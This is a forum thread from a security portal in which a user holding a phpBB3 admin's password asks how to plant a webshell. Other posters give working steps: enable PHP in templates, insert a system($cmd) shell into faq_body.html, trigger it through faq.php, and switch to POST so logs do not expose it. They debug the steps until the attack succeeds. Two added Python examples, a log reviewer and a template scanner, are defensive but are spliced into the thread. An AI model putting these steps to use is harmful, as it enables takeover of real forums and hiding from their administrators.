Waraxe IT Security Portal  
phpbb3 how to get webshell
Posted: Fri Dec 07, 2007 1:46 am
akens
Regular user
Joined: Dec 06, 2007
Posts: 22

I got an admin's pwd, but after logging in I found I can't get a webshell.
phpBB2 can upload a .sql file and restore the database; phpBB3 can't do it.
Can anyone tell me a way?
Thanks for your help!

Posted: Fri Dec 07, 2007 1:34 pm
pexli
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria

Admin panel --> Security settings. Scroll down and set 'Allow php bla bla' to ON.
Styles --> templates --> edit --> faq_blabla.html and put your code

<!-- PHP --> code <!-- ENDPHP -->

Then

http://victim.com/phpBB3/faq.php


Last edited by pexli on Fri Dec 07, 2007 9:41 pm; edited 1 time in total

Posted: Fri Dec 07, 2007 2:29 pm
akens
Regular user
Joined: Dec 06, 2007
Posts: 22

koko wrote:
Admin panel --> Security settings. Scroll down and set 'Allow php bla bla' to ON.
Styles --> templates --> edit --> faq_blabla.html and put your code

<!-- PHP --> code <!-- END PHP -->

Then

http://victim.com/phpBB3/faq.php

Thanks koko, I will test!!

Posted: Fri Dec 07, 2007 4:04 pm
akens
Regular user
Joined: Dec 06, 2007
Posts: 22

I regret that I failed the test.
I changed the code to c99shell, then visited faq.php, but it's not working!
Test environment: winxp+mysql5.0+php+phpbb3 v3.0.RC8

I would very much like to know that this is how the case

Thanks again!

Posted: Fri Dec 07, 2007 7:53 pm
pexli
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria

c99 sucks. Only lamers use this shell. Learn to use some sample code. Like

<?php echo "$cmd" ?>
<? system($cmd) ?>

This code works much, much better than your c99, and I did not write in my post to delete all the faq_blabla.html code and put your code in there.

Posted: Sat Dec 08, 2007 1:02 pm
pexli
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria

Tested on RC8 a few minutes ago and it is working.

Posted: Sat Dec 08, 2007 2:02 pm
akens
Regular user
Joined: Dec 06, 2007
Posts: 22

Following your tips, I also tested for a whole day but did not achieve the desired results. The inserted code has indeed been parsed, but it does not seem to be included in faq.php. I do not know which step went wrong.
My steps:
1: Admin panel --> Security settings --> allow php templates (yes)
2: Styles --> templates --> edit --> faq_body.html and put code
<!-- PHP -->
<? system($cmd) ?>
<!-- END PHP -->
I didn't delete the faq_blabla.html code
3: visit http://*****.com/phpBB3/faq.php?cmd=ls
Are these steps wrong?

Posted: Sat Dec 08, 2007 3:23 pm
pexli
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria

akens wrote:
Following your tips, I also tested for a whole day but did not achieve the desired results. The inserted code has indeed been parsed, but it does not seem to be included in faq.php. I do not know which step went wrong.
My steps:
1: Admin panel --> Security settings --> allow php templates (yes)
2: Styles --> templates --> edit --> faq_body.html and put code
<!-- PHP -->
<? system($cmd) ?>
<!-- END PHP -->
I didn't delete the faq_blabla.html code
3: visit http://*****.com/phpBB3/faq.php?cmd=ls
Are these steps wrong?

<!-- PHP --> @system($cmd) <!-- ENDPHP -->

Do you know the difference between the POST and GET methods? If the admin looks in the logs, he will see something like GET phpBB3/faq.php?cmd=ls and your shell will be deleted.
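
The log entry described in the post above is what a defender would search for. Added example, not part of any post in this thread: it reviews access-log lines for faq.php requests that fall outside the page's normal profile. The log lines are constructed, and the EXPECTED_PARAMS allowlist is an assumption about a stock phpBB3 install.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: the only query parameters a stock faq.php is expected to receive.
EXPECTED_PARAMS = {"mode", "sid"}

# Apache/nginx "combined" format: method and target sit in the quoted request line.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def review_faq_requests(lines, script="faq.php"):
    """Return (ip, reason) findings for requests to `script` that look out of profile."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not url.path.endswith("/" + script):
            continue
        names = {k for k, _ in parse_qsl(url.query, keep_blank_values=True)}
        extra = sorted(names - EXPECTED_PARAMS)
        if extra:
            findings.append((m["ip"], "unexpected query parameter(s): " + ", ".join(extra)))
        if m["method"] not in ("GET", "HEAD"):
            # A POST body never reaches the access log, so the method is the signal.
            findings.append((m["ip"], m["method"] + " to a read-only page"))
    return findings

# Constructed sample lines (documentation IP ranges), not taken from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Dec/2007:15:20:01 +0000] "GET /phpBB3/faq.php?mode=bbcode HTTP/1.1" 200 18234 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [08/Dec/2007:15:21:44 +0000] "GET /phpBB3/faq.php?cmd=ls HTTP/1.1" 200 19011 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [08/Dec/2007:15:22:10 +0000] "POST /phpBB3/faq.php HTTP/1.1" 200 19950 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [08/Dec/2007:15:23:00 +0000] "GET /phpBB3/viewtopic.php?t=5 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, reason in review_faq_requests(SAMPLE_LOG):
        print(ip, reason)
```

Moving the parameter into a POST body hides its value from the access log, not the request itself, so the method check still fires.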

Posted: Sat Dec 08, 2007 4:41 pm
akens
Regular user
Joined: Dec 06, 2007
Posts: 22

I test only on my localhost!
Does GET or POST influence getting a shell?
The question now is the key to insert the normal implementation of the code
Please forgive my ignorance, I will try to find some information to supplement my knowledge!
As a novice, the only thing I can do is to
spend a lot of time and effort to understand the issue. Thank you for your help!
If there were a video, I think I would progress faster :P

Posted: Sat Dec 08, 2007 9:32 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

akens wrote:
I test only on my localhost!
Does GET or POST influence getting a shell?
The question now is the key to insert the normal implementation of the code
Please forgive my ignorance, I will try to find some information to supplement my knowledge!
As a novice, the only thing I can do is to
spend a lot of time and effort to understand the issue. Thank you for your help!
If there were a video, I think I would progress faster :P

If "register_globals" is off, then you must access $_GET or $_POST directly anyway!

Posted: Sat Dec 08, 2007 9:44 pm
akens
Regular user
Joined: Dec 06, 2007
Posts: 22

Test success.
Thanks for koko's and Waraxe's help!

Posted: Sun Jun 01, 2008 9:15 pm
siurek22
Regular user
Joined: May 31, 2008
Posts: 13

I have a problem with it: when I put in your code, the site gives me an error
"Parse error: syntax error, unexpected '}' in /home/zycien/domains/zfn.pl/public_html/forum/includes/template.php(175) : eval()'d code on line 1"

Posted: Mon Jun 02, 2008 1:22 am
gibbocool
Advanced user
Joined: Jan 22, 2008
Posts: 208

Check the "}" are correct in the code. It seems there is one too many, or one out of place. If you have no idea what I'm talking about then post the code here and I will fix it.

_________________
http://www.gibbocool.com

Posted: Mon Jun 02, 2008 4:40 am
siurek22
Regular user
Joined: May 31, 2008
Posts: 13

Code:
<!-- PHP -->
<? system($cmd); ?>
<!-- END PHP -->

I used this code and I don't know why that is, because in this code have any "}" :/

Posted: Mon Jun 02, 2008 6:31 am
pexli
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria

siurek22, remove <? ?> from the code.
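
The parse error quoted earlier in the thread shows includes/template.php passing template content to eval(), which is why PHP directives inside a template deserve an audit. Added example, not from the thread or from phpBB: a scanner that lists PHP blocks and INCLUDEPHP directives found in template files. The directory layout and file contents in demo() are constructed, and it assumes templates are .html files on disk (copies kept in a database or compiled cache are out of its scope).

```python
import re
import tempfile
from pathlib import Path

# Both closing spellings seen in the thread ("ENDPHP" and "END PHP") are matched.
PHP_BLOCK = re.compile(r"<!--\s*PHP\s*-->(.*?)<!--\s*END\s?PHP\s*-->", re.S)
INCLUDE_PHP = re.compile(r"<!--\s*INCLUDEPHP\s+(\S+)\s*-->")

def audit_templates(styles_root):
    """Return sorted (relative_path, line_no, kind) for each PHP directive in *.html files."""
    root = Path(styles_root)
    hits = []
    for path in root.rglob("*.html"):
        text = path.read_text(encoding="utf-8", errors="replace")
        for kind, rx in (("PHP block", PHP_BLOCK), ("INCLUDEPHP", INCLUDE_PHP)):
            for m in rx.finditer(text):
                # Line number of the opening marker, 1-based.
                line_no = text.count("\n", 0, m.start()) + 1
                hits.append((path.relative_to(root).as_posix(), line_no, kind))
    return sorted(hits)

def demo():
    """Build a constructed styles tree with one clean and one modified template."""
    with tempfile.TemporaryDirectory() as d:
        tpl = Path(d) / "prosilver" / "template"
        tpl.mkdir(parents=True)
        (tpl / "index_body.html").write_text("<h1>{SITENAME}</h1>\n")
        (tpl / "faq_body.html").write_text(
            "<h2>{L_FAQ_TITLE}</h2>\n"
            "<!-- PHP --> echo 'constructed marker'; <!-- ENDPHP -->\n"
        )
        return audit_templates(d)

if __name__ == "__main__":
    for rel_path, line_no, kind in demo():
        print(f"{rel_path}:{line_no}: {kind}")
```

A stock style is expected to return an empty list, so any hit is worth comparing against the files shipped in the release package.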
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2013 Janek Vind "waraxe"